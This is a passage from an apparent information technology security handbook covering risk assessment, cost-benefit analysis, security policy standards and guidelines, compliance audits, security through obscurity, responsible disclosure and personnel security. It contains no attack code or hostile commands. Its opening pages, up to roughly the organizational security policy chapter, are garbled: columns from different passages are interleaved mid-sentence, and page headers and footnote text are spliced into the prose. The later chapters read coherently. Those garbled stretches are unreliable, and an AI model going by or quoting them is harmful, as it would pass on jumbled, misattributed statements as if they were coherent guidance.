A on educated guesses extrapolated from past experience. simple cost calculation considers the cost of repairing For instance: or replacing a particular item. A more sophisticated cost · Your power company (and your past experience) calculation can consider the cost of having equipment can provide an estimate of the likelihood that your out of service, the cost of added training, the cost of building would suffer a power outage during the additional procedures resulting from a loss, the cost to next year. Officials may also be able to quantify the a company's reputation, and even the cost to a company's risk of an outage lasting a few seconds vs. the risk clients. Generally speaking, including more factors in of an outage lasting minutes or hours. 53Changes in personnel include many new hires or layoffs, or a layoff of someone involved in your organization's security plan. Changes in systems include installing a number of new systems (the sensitivity of the number depends on the size of your organization; if you have 100 computers and add one securely it does not require a risk assessment. However, if you have ten computers and add another ten, that expansion might merit a fresh look at your organization. Other relevant system changes would include establishing new internal or external networks, upgrading your systems, or altering your computing platform. Changes to the organization include rapid growth, linking to international suppliers or customers, and marketing campaigns that may make you a more visible presence (and a more visible target) in your locality and the world. 100 INFORMATION SECURITY AND GOVERNMENT POLICIES · Your personnel records can be used to estimate the This comparison results in a prioritized list of things you probability of key computing employees quitting. should address. The list may be surprising. 
Your goal · Past experience and best guess can be used to should be to avoid expensive, probable losses, before estimate the probability of a serious bug being worrying about less likely, low-damage threats. In many discovered in your software during the next year environments, fire and loss of key personnel are much (100% for some software platforms). more likely to occur, and are more damaging than a break- in over the network. Surprisingly, however, it is break-ins If you expect something to happen more than once per that seem to occupy the attention and budget of most year, then record the number of times that you expect managers. This practice is simply not cost-effective, nor it to happen. Thus, you may expect a serious earth- does it provide the highest levels of trust in your overall quake only once every 100 years (1% in your list), system. To figure out what you should do, take the fig- but you may expect three serious bugs in Microsoft's ures that you have gathered for avoidance and recovery Internet Information Server (IIS) to be discovered to determine how best to address your high-priority during the next month (3600%). items. The way to do this is to add the cost of recovery to the expected average loss, and multiply that by the The Cost of Prevention probability of occurrence. Then, compare the final prod- Finally, you need to calculate the cost of preventing uct with the yearly cost of avoidance. If the cost of each kind of loss. For instance, the cost to recover from avoidance is lower than the risk you are defending a momentary power failure is probably only that of per- against, you would be advised to invest in the avoidance sonnel "downtime" and the time necessary to reboot. strategy if you have sufficient financial resources. If the However, the cost of prevention may be that of buying cost of avoidance is higher than the risk that you are and installing a UPS system. 
defending against, then consider doing nothing until after other threats have been dealt with. Costs need to be amortized over the expected lifetime of your approaches, as appropriate. Deriving these costs may reveal secondary costs and credits that should also be factored in. For instance, installing a better fire-suppression system may result in a yearly decrease in your fire insurance premiums and give you a tax benefit for capital depreciation. But spending money on a fire-suppression system means that the money is not available for other purposes, such as increased employee training or even investments. Adding Up the Numbers At the conclusion of this exercise, you should have a multidimensional table consisting of assets, risks, and possible losses. For each loss, you should know its prob- ability, the predicted loss, and the amount of money required to defend against the loss. If you are very pre- cise, you will also have a probability that your defense will prove inadequate. The process of determining if each defense should or should not be employed is now straightforward. You do this by multiplying each expect- ed loss by the probability of its occurring as a result of each threat. Sort these in descending order, and compare each cost of occurrence to its cost of defense. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 101 CHAPTER 4. 4) Implementing security PLANNING YOUR SECURITY NEEDS 5) Performing audit and incident response At a Glance There are two critical principles implicit in effective policy and security planning: This chapter covers policy and procedural issue related Policy and security awareness must be driven from the to creating an effective defense to the security threats top down in the organization. Security concerns and presented in the previous chapter and goes into greater awareness by the users are important, but they cannot detail on the planning process. build or sustain an effective culture of security. 
Instead, Effective Security Based on Technical the head(s) of the organization must treat security as Solutions and Policy Guidance important, and abide by all the same rules and regula- tions as everyone else. Fundamentally, computer security is a series of technical Effective computer security means protecting information. solutions to non-technical problems. You can spend an Although protecting resources is also critical, resource unlimited amount of time, money, and effort on computer losses are more easily identified and remedied than infor- security, but you will never quite solve the problem of mation losses. All plans, policies and procedures should accidental data loss or intentional disruption of your reflect the need to protect information in whatever forms activities. Given the right set of circumstances--software it takes. Proprietary data does not become worthless bugs, accidents, mistakes, bad luck, bad weather, or a P when it is on a printout or is faxed to another site sufficiently motivated and well-equipped attacker--any ART instead of contained in a disk file. Customer confidential computer can be compromised, rendered useless, or even information does not suddenly lose its value because it is totally destroyed. recited on the phone between two users instead of con- THREE tained within an e-mail message. The information should The job of the security professional is to help be protected no matter what its form. organizations decide how much time and money need to be spent on security. Another part of that job is to There are many different kinds of computer security, and make sure that organizations have policies, guidelines, many different definitions. Rather than present a formal and procedures in place so that the money spent is spent definition, this Handbook takes a practical approach and well. And finally, the professional needs to audit the discusses the categories of protection you should consider. 
system to ensure that the appropriate controls are implemented correctly to achieve the policy's goals. Types of Security Concerns Thus, practical security is really a question of management and administration more than it is one of technical skill. Within this broad definition, there are many different Consequently, security must be a priority of your organi- types of security that both users and administrators of zation's management. Even in a very small enterprise computer systems need to be concerned about:54 without a significant budget for security, the manage- ment should understand the core security issues and Confidentiality implement basic (and relatively inexpensive) measures Protecting information from being read or copied by to protect its assets. anyone who has not been explicitly authorized by the owner of that information. This type of security includes Security planning may be divided into five discrete steps: not only protecting the information in toto, but also 1) Planning to address your security needs protecting individual pieces of information that may 2) Conducting a risk assessment or adopting best seem harmless by themselves but that can be used to practices infer other confidential information. 3) Creating policies to reflect your needs 54See also the COBIT approach to security methodology http://www.isaca.org/cobit.htm 102 INFORMATION SECURITY AND GOVERNMENT POLICIES Data integrity Although all of these aspects of security are important, Protecting information (including programs) from being different organizations will view each with a different deleted or altered in any way without the permission of amount of importance. This variance is because different the owner of that information. Information to be protected organizations have different security concerns, and must also includes items such as accounting records, backup set their priorities and policies accordingly. tapes, file creation times, and documentation. 
For example: Availability A Banking Environment Protecting your services so they're not degraded or made unavailable (crashed) without authorization. If the In such an environment, integrity, control, and systems or data are unavailable when an authorized user auditability are usually the most critical concerns, needs them, the result can be as bad as having the while confidentiality and availability are the next in information that resides on the system deleted. importance. A national defenserelated system that processes classified information. In such an environ- Consistency ment, confidentiality may come first, and availability Making sure that the system behaves as expected by the last. In some highly classified environments, officials authorized users. If software or hardware suddenly starts may prefer to blow up a building rather than allow an behaving radically differently from the way it used to attacker to access the information contained within behave, especially after an upgrade or a bug fix, a disas- that building's walls. ter could occur. Imagine if your ls command occasionally deleted files instead of listing them! This type of security A University can also be considered as ensuring the correctness of the In such an environment, integrity and availability may data and software you use. be the most important requirements. It is more important to ensure that students can work on their papers, than Control that administrators can track the precise times that Regulating access to your system. If unknown and students accessed their accounts. unauthorized individuals (or software) are found on your system, they can create a big problem. You must worry If you are a security administrator, you need to about how they got in, what they might have done, and thoroughly understand the needs of your operational who or what else has also accessed your system. environment and users. 
You then need to define your Recovering from such episodes can require considerable procedures accordingly. Not everything we describe in time and expense for rebuilding and reinstalling your this book will be appropriate in every environment. system, and verifying that nothing important has been changed or disclosed--even if nothing actually happened. Trust Audit Security professionals generally don't refer to a As well as worrying about unauthorized users, authorized computer system as being "secure" or "unsecure." users sometimes make mistakes, or even commit mali- Instead, we use the word trust to describe our level cious acts. In such cases, you need to determine what of confidence that a computer system will behave as was done, by whom, and what was affected. The only expected. This acknowledges that absolute security sure way to achieve these results is by having some can never be present. We can only try to approach it incorruptible record of activity on your system that posi- by developing enough trust in the overall configuration tively identifies the actors and actions involved. In some to warrant using it for the applications we have in critical applications, the audit trail may be extensive mind. Developing adequate trust in your computer enough to allow "undo" operations to help restore the systems requires careful thought and planning. system to a correct state. Operational decisions should be based on sound policy and risk analysis and it is important to get professional advice when possible: Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 103 If you are at a larger company, university, or government over time, as new security vulnerabilities are discovered, agency, we suggest that you contact your internal audit or does it decrease over time, as the vulnerabilities are and/or risk management department for additional help publicized and corrected? 
Does a well-maintained sys- (they may already have some plans and policies in place tem become less secure or more secure over time? And that you should know about). You can also learn more how do you calculate the likely damages of a successful about this topic by consulting some of the works refer- penetration? Unfortunately, few statistical, scientific enced in the Annexes. You may also wish to enlist a studies have been performed on these questions. Many consulting firm. For example, many large accounting people think they know the answers to these questions, and audit firms now have teams of professionals that but research has shown that most people badly estimate can evaluate the security of computer installations. risk based on personal experience. If you are with a smaller institution or are dealing with Because of the difficulty inherent in risk analysis, a personal machine, you may not have specialized another approach for securing computers has emerged departments to call on and you should review Part 2 of in recent years called best practices, or due care. This this Handbook carefully. You may decide that we cover approach consists of a series of recommendations, pro- these issues in greater detail than you actually need. cedures, and policies that are generally accepted within However, the information contained in these chapters the community of security practitioners to give organi- should help guide you in setting your priorities. zations a reasonable level of overall security and risk mitigation at a reasonable cost. Best practices can be Cost-Benefit Analysis and Best Practices thought of as "rules of thumb" for implementing sound P security measures. ART Time and money are finite. After you complete your risk assessment, you will have a long list of risks -- far The best practices approach is not without its problems. more than you can possibly address or defend against. 
The biggest problem is that there really is no one set of THREE You now need a way of ranking these risks to decide "best practices" that is applicable to all sites and users. which you need to mitigate through technical means, The best practices for a site that manages financial which you will insure against, and which you will simply information might have similarities to the best practices accept. Traditionally, the decision of which risks to for a site that publishes a community newsletter, but address and which to accept was done using a cost- the financial site would likely have additional security benefit analysis, a process of assigning cost to each measures. possible loss, determining the cost of defending against it, determining the probability that the loss will occur, Following best practices does not assure that your and then determining if the cost of defending against system will not suffer a security-related incident. the risk outweighs the benefit. Most best practices require that an organization's securi- ty office monitor the Internet for news of new attacks Risk assessment and cost-benefit analyses generate a and download patches from vendors when they are made lot of numbers, making the process seem quite scientific available. But even if you follow this regimen, an and mathematical. In practice, however, putting togeth- attacker might still be able to use a novel, unpublished er these numbers can be a time-consuming and expen- attack to compromise your computer system. And if your sive process, and the result are numbers that are fre- news feed is down, or the person monitoring the mailing quently soft or inaccurate. Risk analysis depends on the lists goes on vacation, then the attackers will have a ability to gauge the expected use of an asset, assess lead on your process of installing needed patches. 
the likelihood of each risk to the asset, identify the fac- tors that enable those risks, and calculate the potential The very idea that tens of thousands of organizations impact of various choices--figures that are devilishly could or even should implement the "best" techniques hard to pin down. How do you calculate the risk that an available to secure their computers is problematical. The attacker will be able to obtain system administrator "best" techniques available are simply not appropriate privileges on your web server? Does this risk increase or cost-effective for all organizations. 104 INFORMATION SECURITY AND GOVERNMENT POLICIES Many organizations that claim to be following best practices are actually adopting the minimum standards commonly used for securing systems. In practice, most best practices really aren't. We recommend a combination of risk analysis and best practices. Starting from a body of best practices, an educated designer should evaluate risks and trade-offs, and pick reasonable solutions for a particular configura- tion and management. For instance, servers should be hosted on isolated machines, and configured with an operating system and software providing the minimally required functionality. The operators should be vigilant for changes, keep up-to-date on patches, and prepare for the unexpected. Doing this well takes a solid under- standing of how the system works, and what happens when it doesn't work. This is the approach that we will explain in the sections that follow. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 105 CHAPTER 5. Another benefit of risk assessment is that it helps ORGANIZATIONAL SECURITY POLICY to justify to management that you need additional AND PREVENTION resources for security. Most managers and directors know little about computers, but they do understand At A Glance risk and cost/benefit analysis. 
If you can show that your organization is currently facing an exposure to risk that could total a certain monetary amount per year This chapter addresses security policy from the bottom (add up all the expected losses plus recovery costs for up and the top down; everyone in the organization has what is currently in place), then this estimate might some role to play in ensuring the security of computers, help convince management to fund some additional networks, and data. Supplementary management check- personnel and resources. lists to this chapter have been provided at the end of Part 3. On the other hand, going to management with a vague Security in a Working Organization "We're really likely to see several break-ins on the Internet after the next CERT/CC announcement" is unlikely to produce anything other than mild concern (if that). Security is not free. The more elaborate your security measures become, the more expensive they become. The Role of Security Policy Systems that are more secure may also be more difficult to use, although this need not always be the case. Policy helps to define what you consider to be valuable, Security can also get in the way of "power users," who P and it specifies what steps should be taken to safeguard wish to exercise many difficult and sometimes dangerous ART those assets. operations with-out authentication or accountability. Some of these power users can be politically powerful Policy can be formulated in a number of different ways. within your organization. Alternatively, some organiza- THREE You could write a very simple, general policy of a few tions may feel that any security measures are too costly pages that covers most possibilities. You could also and will try to conduct business without taking the time craft a policy for different sets of assets: a policy for to assess the true costs of implementation and the e-mail, a policy for personnel data, and a policy on potential losses from a negligent attitude. 
A series of accounting information. A third approach, taken by checklists has been provided at the end of Part 3 which many large corporations, but applicable to organizations outline steps that may be taken, at various levels, to of all sizes, is to have a small, simple policy augmented ensure that the computing environment is as safe as with standards and guidelines for appropriate behavior. possible, given certain constraints on time, personnel, We'll briefly outline this latter approach, with the read- and financial resources. er's understanding that simpler policies can be crafted; more information is given in the references. After you have completed your risk assessment and cost-benefit analysis, you will need to convince your Policy plays three major roles. First, it makes clear what organization's management of the need to act upon the is being protected and why. Second, it clearly states the information. Normally, you would formulate a policy that responsibility for that protection. Third, it provides a is then officially adopted. Frequently, this process is an ground on which to interpret and resolve any later uphill battle. Fortunately, it does not have to be. The goal conflicts that might arise. What the policy should not of risk assessment and cost-benefit analysis is to priori- do is list specific threats, machines, or individuals by tize your actions and spending on security. If your busi- name--the policy should be general and change little ness plan is such that you should not have an uninsured over time. risk of more than a certain monetary amount per year, you can use your risk analysis to determine what needs to be spent to achieve this goal. Your analysis can also be a guide as to what to do first, and then second, and can identify which things you should relegate to later years. 
106 INFORMATION SECURITY AND GOVERNMENT POLICIES Standards Guidelines Standards are intended to codify the successful Guidelines are the "should" statements in policies. practice of security in an organization. They are The intent of guidelines is to interpret standards for generally phrased in terms of "shall." Standards are a particular environment--whether that is a software generally platform independent, and at least imply a environment or a physical environment. Unlike standards, metric to determine if they have been met. Standards guidelines may be violated, if necessary. As the name are developed in support of policy, and change slowly suggests, guidelines are not usually used as standards over time. Standards might cover such issues as how to of performance, but as ways to help guide behavior. screen new hires, how long to keep backups, and how to test UPS systems. Here is a typical guideline for backups: For example, consider a standard for backups. Backups on Unix-based machines should be done with It might state: the "dump" program. Backups should be done nightly, Backups shall be made of all online data and software in single-user mode, for systems that are not in 24-hour on a regular basis. In no case will backups be done production use. Backups for systems in 24-hour produc- any less often than once every 72 hours of normal tion mode should be made at the shift change closest business operation. All backups should be kept for a to midnight, when the system is less loaded. All back- period of at least six months; the first backup in ups will be read and verified immediately after being January and July of each year will be kept indefinitely written. at an off-site, secured storage location. At least one full backup of the entire system shall be taken every Level 0 dumps will be done for the first backup in other week. All backup media will meet accepted January and July. 
Level 3 backups should be done on industry standards for its type, to be readable after a the 1st and 15th of every month. Level 5 backups minimum of five years in unattended storage. should be done every Monday and Thursday night, unless a level 0 or level 3 backup is done on that day. This standard does not name a particular backup mecha- Level 7 backups should be done every other night nism or software package. It clearly states, however, except on holidays. what is to be stored, how long it is to be stored, and how often it is to be made. Once per week, the administrator will pick a file at ran- dom from some backup made that week. The operator Consider a possible standard for authentication: will be required to recover that file as a test of the Every user account on each multi-user machine shall backup procedures. have only one person authorized to use it. That user will be required to authenticate his or her identity to Guidelines tend to be very specific to particular archi- the system using some positive proof of identity. This tectures and even to specific machines. Guidelines also proof of identity can be through the use of an tend to change more often than do standards, to reflect approved authentication token or smart card, an changing conditions. approved one-time password mechanism, or an approved biometric unit. Reusable passwords will not Some Key Ideas in Developing be used for primary authentication on any machine a Workable Policy that is ever connected to a network or modem, that is portable and carried off company property, or that is The role of policy (and associated standards and guide- used outside of a private office. lines) is to help protect those items you (collectively) view as important. They do not need to be overly spe- cific and complicated in most instances. Sometimes, a simple policy statement is sufficient for your environment, as in the following example. 
Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 107

The use and protection of this system is everyone's responsibility. Only do things you would want everyone else to do, too. Respect the privacy of other users. If you find a problem, fix it yourself or report it right away. Abide by all applicable laws concerning use of the system. Be responsible for what you do and always identify yourself. Have fun!

Other times, a more formal policy, reviewed by a legal professional and various security consultants, is the way you need to go to protect your assets. Each organization will be different. There are some key ideas to your policy formation, though, that need to be mentioned more explicitly.

Assign an owner

Every piece of information and equipment to be protected should have an assigned "owner." The owner is the person who is responsible for the information, including its copying, destruction, backups, and other aspects of protection. This is also the person who has some authority with respect to granting access to the information.

The problem with security in many environments is that there is important information that has no clear owner. As a result, users are never sure who makes decisions about the storage of the information, or who regulates access to the information. Information (and even equipment!) sometimes disappears without anyone noticing for a long period of time because there is no "owner" to contact or monitor the situation.

Be positive

People respond better to positive statements than to negative ones. Instead of building long lists of "don't do this" statements, think how to phrase the same information positively. The abbreviated policy statement above could have been written as a set of "don'ts" as follows, but consider how much better it read originally:

It's your responsibility not to allow misuse of the system. Don't do things you wouldn't want others to do, too. Don't violate the privacy of others. If you find a problem, don't keep it a secret if you can't fix it yourself. Don't violate any laws concerning use of the system. Don't try to shift responsibility for what you do to someone else and don't hide your identity. Don't have a bad time!

When writing policies, keep users in mind. They will make mistakes, and they will misunderstand. The policy should not suggest that users will be thrown to the wolves if an error occurs.

Furthermore, consider that information systems may contain information about users that they would like to keep somewhat private. This may include some e-mail, personnel records, and job evaluations. This material should be protected, too, although you may not be able to guarantee absolute privacy. Be considerate of users' needs and feelings.

Concentrate on training and awareness

You would be wise to include standards for training and retraining of all users. Every user should have basic security awareness education, with some form of periodic refresher material (even if the refresher only involves being given a copy of this book!). Trained and educated users are less likely to fall for scams and social engineering attacks. They are also more likely to be happy about security measures if they understand why they are in place.

A crucial part of any security system is giving staff time and support for additional training and education. There are always new tools and new threats, new techniques, and new information to be learned. If staff members are spending 60 hours each week chasing down phantom PC viruses and doing backups, they will not be as effective as staff given a few weeks of training time each year. Furthermore, they are more likely to be happy with their work if they are given a chance to grow and learn on the job, and are allowed to spend evenings and weekends with their families instead of trying to catch up on installing software and making backups.

Have authority commensurate with responsibility

The first principle of security administration: if you have responsibility for security, but have no authority to set rules or punish violators, it is likely that you will have to take the blame when something big goes wrong.

108 INFORMATION SECURITY AND GOVERNMENT POLICIES

This Part includes checklists for managers and personnel who will be responsible for security. Important elements to any organization's security plan are covered including: communication, awareness, training, and appropriate funding to support the plan.

Be sure you know your security perimeter

When you write your policy, you want to be certain to include all of the various systems, networks, personnel, and information storage within your security perimeter. The perimeter defines what is "within" your control and concern. When formulating your policies, you need to be certain you include coverage of everything that is "within" your perimeter or that could enter your perimeter and interact with your information resources.

In earlier years, many organizations defined their IT security perimeter to be their walls and fences. Nowadays, the perimeter is less concrete.

For example, consider the following when developing your policies:

· Portable computers and PDAs can be used to access information while away from your physical location. Furthermore, they may store sensitive information, including IP addresses, phone numbers, and passwords. These systems should have minimum levels of protection, including passwords, encryption, and physical security markings. Users should have additional training and awareness about dangers of theft and eavesdropping.

· Wireless networks used on the premises or otherwise connected to site resources may be connected to by outsiders using directional antennas or simply parked in a car outside the building with a laptop. Wireless networks should be configured and protected to prevent sensitive material from being observed outside, and to prevent insertion of malicious code by attackers.

· Computers used at home by the organization's personnel are subject to penetration, theft, and the accidental insertion of malicious code. They may also be used contrary to organizational policy (e.g., to run a business, or host a web server with questionable content). The policy needs to make clear how these machines are to be used, protected, and audited.

· Media is dense and portable. If someone makes a CD or DVD of the company financial records to use at a remote site, what happens if the media is stolen or misplaced? Policies should govern who is allowed to take media off-site, how it is to be protected (including encryption) and what is to happen if it is lost or stolen. They should also detail how and when previously used media will be destroyed to limit its potential exposure.

· What are the policies governing people who bring their own PDAs or laptops on site for meetings or simply while visiting? What are the rules governing their connection to site networks, phone lines, printers, or other devices?

· What concerns are there about shipping computers or storage devices offsite for maintenance? What if there is sensitive material on disk? What about leased equipment that is returned to the owner?

· If business partners or contractors have access to your equipment, at your site or at theirs, who guards the material? How is it kept from unwanted contamination or commingling with their own sensitive data?

· What policies will be in place to govern the handling of information provided to your organization under trade secret protection or license? Who is responsible for protecting the information, and where can it be kept and stored?

· What policies govern non-computer information processing equipment? For instance, what policies govern use of the printers, copiers, and fax machines? (Sensitive information on paper is no less sensitive than online.)

Thinking about all these issues before a problem occurs helps keep the problems from occurring. Building sensible statements into your security policy helps everyone to understand the concerns and take the proper precautions.

Pick a basic approach to security issues

Decide if you are going to build around the model of "Everything that is not specifically denied is permitted" or "Everything that is not specifically permitted is denied." Then be consistent in how you define everything else. The first choice might be most consistent with a relatively open environment, such as a university, while the second case would be more consistent with a commercial institution, such as a bank.

Defend in depth

When you plan your defenses and policy, don't stop at one layer. Institute multiple, redundant, independent levels of protection. Then include auditing and monitoring to ensure that those protections are working. The chance of an attacker's evading one set of defenses is far greater than the chance of his evading three layers plus an alarm system.55

55 See "The 12 Layer Matrix: Building a Cyber-Fortress (2003)" by Tom Kellermann at: http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Tools

Ensuring Compliance and Security Audits

Formulating policy is not enough by itself. It is important to regularly determine if the policy is being applied correctly, and if the policy is correct and sufficient. This is normally done with a compliance audit. The term audit is overloaded, often used to mean (at least) a financial audit, an audit trail (log), a security audit of a system, and a compliance audit for policy.

A compliance audit is a set of actions carried out to measure whether standards set by policies are being met and, if not, why. Standards normally imply metrics and evaluation criteria that can be used by an auditor to measure this compliance. When standards are not met, it can be because of any of a combination of:

1. Personnel shortcomings
2. Insufficient training or lack of appropriate skills
3. Overwork
4. Malfeasance
5. Lack of motivation
6. Material shortcomings
7. Insufficient or inadequate resources
8. Inadequate maintenance
9. Overload/overuse
10. Organizational shortcomings
11. Lack of authority/responsibility
12. Conflicting responsibilities
13. Unclear/inconsistent/confusing tasking
14. Policy shortcomings
15. Unforeseen risks
16. Missing or incomplete policies
17. Conflicting policies
18. Mismatch between policy and environment

What is key to note about this list is that the vast majority of causes of policy problems cannot be blamed on the operator or administrator. Even inadequate training and overwork are generally not the administrator's choice. Thus, a compliance audit should not be viewed (nor conducted) as an adversarial process. Instead, it should be conducted as a collaborative effort to identify problems, obtain and reallocate resources, refine policies and standards, and raise awareness of security needs. As with all security, a team approach is almost always the most effective. When managed properly, your personnel can embrace good security. The key is to help them in doing their tasks rather than being "on the other side."

The Problem with Security Through Obscurity

In traditional security, derived largely from military intelligence, there is the concept of "need to know." Information is partitioned, and you are given only as much as you need to do your job. In environments where specific items of information are sensitive or where inferential security is a concern, this policy makes considerable sense. If three pieces of information together can form a damaging conclusion and no one has access to more than two, you can ensure confidentiality.

In a computer operations environment, applying the same need-to-know concept is usually not appropriate. This is especially true if you should find yourself basing your security on the fact that something technical is unknown to your attackers. This concept can even hurt your security.

Consider an environment in which management decides to keep the manuals away from the users to prevent them from learning about commands and options that might be used to crack the system. Under such circumstances, the managers might believe they have increased their security, but they probably have not. A determined attacker will find the same documentation elsewhere--from other users or from other sites. Extensive amounts of documentation are available as close as the nearest bookstore! Management cannot close down all possible avenues for learning about the system. In the meantime, the local users are likely to make less efficient use of the machine because they are unable to view the documentation and learn about more efficient options. They are also likely to have a poorer attitude because the implicit message from management is "We don't completely trust you to be a responsible user." Furthermore, if someone does start abusing commands and features of the system, management may not have a pool of talent to recognize or deal with the problem. And if something should happen to the one or two users authorized to access the documentation, there is no one with the requisite experience or knowledge to step in or help out.

Keeping bugs or features secret to protect them is also a poor approach to security. System developers often insert back doors in their programs to let them gain privileges without supplying passwords. Other times, system bugs with profound security implications are allowed to persist because management assumes that nobody knows of them. The problem with these approaches is that features and problems in the code have a tendency to be discovered by accident or by determined attackers. The fact that the bugs and features are kept secret means that they are unwatched, and probably unpatched. After being discovered, the existence of the problem will make all similar systems vulnerable to attack by the persons who discover the problem.

Keeping algorithms, such as a locally developed encryption algorithm, secret is also of questionable value. Unless you are an expert in cryptography, you are unlikely to be able to analyze the strength of your algorithm. The result may be a mechanism that has a serious flaw in it. An algorithm that is kept secret isn't scrutinized by others, and thus someone who does discover the hole may have free access to your data without your knowledge.

Likewise, keeping the source code of your operating system or application secret is no guarantee of security. Those who are determined to break into your system will occasionally find security holes, with or without source code.56 But without the source code, users cannot carry out a systematic examination of a program for problems. Thus, there may be some small benefit to keeping the code hidden, but it shouldn't be depended on.

56 Unless you're developing the software all by yourself on your own workstation, several people may have access to the source code, and, intentionally or accidentally, code gets leaked.

The key is attitude. Defensive measures that are based primarily on secrecy lose all their value if their secrecy is breached. Even worse, when maintaining secrecy restricts or prevents auditing and monitoring, it can be impossible to determine whether secrecy has been breached. You are better served by algorithms and mechanisms that are inherently strong, even if they're known to an attacker. The very fact that you are using strong, known mechanisms may discourage an attacker and cause the idly curious to seek excitement elsewhere. Putting your money in a wall safe is better protection than depending on the fact that no one knows that you hide your money in a mayonnaise jar in your refrigerator.

Responsible Disclosure

Despite our objection to "security through obscurity," we do not advocate that you widely publicize new security holes the moment that you find them. There is a difference between secrecy and prudence! If you discover a security hole in distributed or widely available software, you should quietly report it to the vendor as soon as possible. We would also recommend that you report it to one of the FIRST teams (described in Annex 4, Organizations). Those organizations can take action to help vendors develop patches and see that they are distributed in an appropriate manner.

If you "go public" with a security hole, you endanger all of the people who are running that software but who don't have the ability to apply fixes. In the Unix environment, many users are accustomed to having the source code available to make local modifications to correct flaws. Unfortunately, not everyone is so lucky, and many people have to wait weeks or months for updated software from their vendors. Some sites may not even be able to upgrade their software because they're running a turn-key application, or one that has been certified in some way based on the current configuration. Other systems are being run by individuals who don't have the necessary expertise to apply patches. Still others are no longer in production, or are at least out of maintenance. Always act responsibly. It may be preferable to circulate a patch without explaining or implying the underlying vulnerability than to give attackers details on how to break into unpatched systems.

We have seen many instances in which a well-intentioned person reported a significant security problem in a very public forum. Although the person's intention was to elicit a rapid fix from the affected vendors, the result was a wave of break-ins to systems where the administrators did not have access to the same public forum, or were unable to apply a fix appropriate for their environment.

Posting details of the latest security vulnerability in your system to a mailing list if there is no patch available will not only endanger many other sites, it may also open you to civil action for damages if that flaw is used to break into those sites.57 If you are concerned with your security, realize that you're a part of a community. Seek to reinforce the security of everyone else in that community as well--and remember that you may need the assistance of others one day.

57 Although we are unaware of any cases having been filed yet on these grounds, several lawyers have told us that they are waiting for their clients to request such an action. Several believe this to be a viable course of action.

Conclusions on Policy and Prevention

The key to successful risk assessment is to identify all of the possible threats to your system, and to defend against those attacks which you think are realistic threats.

Simply because people are the weak link doesn't mean we should ignore other safeguards. People are unpredictable, but breaking into a dial-in modem that does not have a password is still cheaper than a bribe. So, we use technological defenses where we can, and we improve our personnel security by educating our staff and users. We also rely on defense in depth: we apply multiple levels of defenses as backups in case some fail. For instance, we buy that second UPS system, or we put a separate lock on the computer room door even though we have a lock on the building door. These combinations can be defeated too, but we increase the effort and cost for an enemy to do that...and maybe we can convince them that doing so isn't worth the trouble. At the very least, you can hope to slow them down enough so that your monitoring and alarms will bring help before anything significant is lost or damaged.

With these limits in mind, you need to approach computer security with a thoughtfully developed set of priorities. You can't protect against every possible threat. Sometimes you should allow a problem to occur rather than prevent it, and then clean up afterwards. For instance, your efforts might be cheaper and less trouble if you let the systems go down in a power failure and then reboot than if you bought a UPS system. And some things you simply don't bother to defend against, either because they are too unlikely (e.g., an alien invasion from space), too difficult to defend against (e.g., a nuclear blast within 500 yards of your data center), or simply too catastrophic and horrible to contemplate (e.g., your management decides to switch all your Unix machines to some well-known PC operating system). The key to good management is knowing what things you will worry about, and to what degree.

Decide what you want to protect and what the costs might be to prevent those losses versus the cost of recovering from those losses. Then make your decisions for action and security measures based on a prioritized list of the most critical needs. Be sure you include more than your computers in this analysis: don't forget that your backup tapes, your network connections, your terminals, and your documentation are all part of the system and represent potential loss. The safety of your personnel, your corporate site, and your reputation are also very important and should be included in your plans.

CHAPTER 6. PERSONNEL SECURITY

At a Glance

This chapter outlines the security issues that emanate from inside the organization. From hiring and firing procedures to employee training and awareness, personnel security will play a critical role in the organizational response to preventive and defensive measures taken on the company's behalf.

Personnel Risks: A Hidden Threat to the Organization

Consider a few personnel incidents that made the news in the last few years:

· Nick Leeson, an investment trader at the Barings Bank office in Singapore, and Toshihide Iguchi of the Daiwa Bank office in New York City, each made risky investments and lost substantial amounts of their bank's funds. Rather than admit to the losses, each of them altered computer records and effectively gambled more money to recoup the losses. Eventually, both were discovered after each bank lost more than one billion dollars. As a result, Barings was forced into insolvency, and Daiwa may not be allowed to operate in the United States in the future.

· In the U.S., agents and other individuals with high-security clearances at the CIA, the FBI and the Armed Forces (Aldrich Ames, Jonathan Pollard, Robert Hanssen, and Robert Walker, to name a few) were discovered to have been passing classified information to Russia and to Israel. Despite several special controls for security, these individuals were able to commit damaging acts of espionage -- in some cases, for more than a decade.

· John Deutch, the director of the CIA under President Clinton, was found to have taken classified government information from the Agency to his house, where the information was stored on classified computers configured for unclassified use and appropriately marked as "unclassified." While the classified information was resident, these same computers were used to access pornographic web sites -- web sites that could have launched attacks against the computers using both public and undisclosed security vulnerabilities. Yet despite the fact that numerous policies and laws were broken, no administrative action was taken against Deutch, and Deutch was issued a Presidential pardon by Clinton on Clinton's last day of office.

If you examine these cases and the vast number of computer security violations committed over the past few decades, you will find one common characteristic: 100% of them were caused by people. Break-ins were caused by people. Computer viruses were written by people. Passwords were stolen by people.

"Personnel security" is everything involving employees: hiring them, training them, monitoring their behavior, and, sometimes, handling their departure. Statistics show that the most common perpetrators of significant computer crime in some contexts are those people who have legitimate access now, or who have recently had access; some studies show that over 80% of incidents are caused by these individuals. Thus, managing personnel with privileged access is an important part of a good security plan.

People are involved in computer security problems in two ways. Some people unwittingly aid in the commission of security incidents by failing to follow proper procedure, by forgetting security considerations, and by not understanding what they are doing. Other people knowingly violate controls and procedures to cause or aid an incident. As we have noted earlier, the people who knowingly contribute to your security problems are most often your own users (or recent users): they are the ones who know the controls, and know what information of value may be present.

You are likely to encounter both kinds of individuals in the course of administering a Unix system. The controls and mechanisms involved in personnel security are many and varied. Discussions of all of them could fill an entire book, so we'll simply summarize some of the major considerations. These personnel policies will not prevent security breaches, but they will reduce the security threats posed to your enterprise by your own employees.

Security in the Hiring Process

Background Checks

When you hire new employees, check their backgrounds. You may have candidates fill out application forms, but then what do you do? At the least, you should check all references given by each applicant to determine his past record, including reasons why he left those positions. Be certain to verify the dates of employment, and check any gaps in the record. You should also verify any claims of educational achievement and certification: stories abound of individuals who have claimed to have earned graduate degrees from prestigious universities--universities that have no records of those individuals ever completing a class. Other cases involve degrees from "universities" that are little more than a post office box. Consider that an applicant who lies to get a job with you is not establishing a good foundation for future trust.

Intensive Investigations

